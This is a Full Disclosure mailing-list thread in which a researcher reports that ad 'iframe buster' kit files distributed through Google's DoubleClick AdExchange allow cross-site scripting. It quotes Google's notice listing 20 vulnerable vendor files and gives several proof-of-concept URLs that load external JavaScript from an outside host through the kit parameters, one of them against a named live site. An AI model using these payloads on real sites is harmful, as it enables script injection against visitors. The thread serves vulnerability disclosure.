Full Disclosure mailing list archives
Re: Google supported XSS kit aka AdExchange iframe buster kit
From: Zmx <larouanne () gmail com>
Date: Thu, 21 Dec 2017 09:27:08 +0100
Next step, email from DoubleClick <doubleclick-noreply () google com Some more files to clean/check: ---- Dear Customer, We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster. These are the currently identified third-party vendor files: 1. adform/IFrameManager.html 2. admotion/afa-iframe.htm 3. bonzai/bonzaiBuster.html 4. exponential/buster.html 5. eyeblaster/addineyeV2.html 6. eyewonder/interim.html 7. flashtalking/ftlocal.html 8. ipinyou/py_buster.html 9. jivox/jivoxibuster.html 10. mediaplex/mojofb_v9.html 11. mixpo/framebust.html 12. predicta/predicta_bf.html 13. rockabox/rockabox_buster.html 14. liquidus/iframeX.htm 15. controbox/iframebuster.html 16. spongecell/spongecell-spongecellbuster.html 17. unicast/unicastIFD.html 18. adrime/adrime_burst.2.0.0.htm 19. revjet/revjet_buster.html 20. kpsule/iframebuster.html We have disabled these vendors where possible for all DoubleClick for Publishers and DoubleClick Ad Exchange customers. However, any of the mentioned files hosted on your site may still pose a risk and should be taken down. We will notify you as we learn more. For more information please refer to this Help Center article. Regards, The DoubleClick for Publishers and DoubleClick Ad Exchange Teams --------- Fun fact ? You can probably use DoubleClick to help you found website where you can "serve" XSS/expandable ads. Tr4L 2017-12-19 17:09 GMT+01:00 Zmx <larouanne () gmail com>:
Some more details: 1) The google article seems to link the problematic kit only in non-english local (check the french version or spanish one) 2) In order for predicta to work, you should host your javascript on a specific path: /mrm-ad/commons.js 2017-12-19 15:24 GMT+01:00 Zmx <larouanne () gmail com>:Hi list, The DFP AdExchange service of Google (the service who provide ads) is distributing an "Iframe Buster Kit" in order to allow iframe ads to expand outside of the iFrame. This needs some bypass of the restriction applied to iframe, so Google provide a kit to install on your website: - Help Document: https://support.google.com/dfp_premium/answer/1074250 - Kit: https://storage.googleapis.com/support-kms-prod/DB3CE51 C3A5F783ED8198CDA753995FEB913 The kit contains several html and js files to be hosted on your domains. Some of those files (still provide by Google, remember) contains very visible XSS code: One of them is "predicta" that simply allow you to pass the domain of from where to load the javascript. Quick proof of concept: - https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life As expandable ads allow website to gain more ads revenue, those kits is present in a lot of website. Other "iframe buster kit" exist that are not provided by Google, and some of them are also vulnerable. From my list I have: - /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js - /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js - /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (look like different version exist however) - /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js Some source: - Code of predicta_bf.html provide by Google in the kit: https://pastebin.com/BggXDHNA - Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b - Code of rockabox: https://pastebin.com/xqhs3zyz Tr4L
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Google supported XSS kit aka AdExchange iframe buster kit Zmx (Dec 19)
- Re: Google supported XSS kit aka AdExchange iframe buster kit Zmx (Dec 19)
- Re: Google supported XSS kit aka AdExchange iframe buster kit Zmx (Dec 23)
- Re: Google supported XSS kit aka AdExchange iframe buster kit Zmx (Dec 19)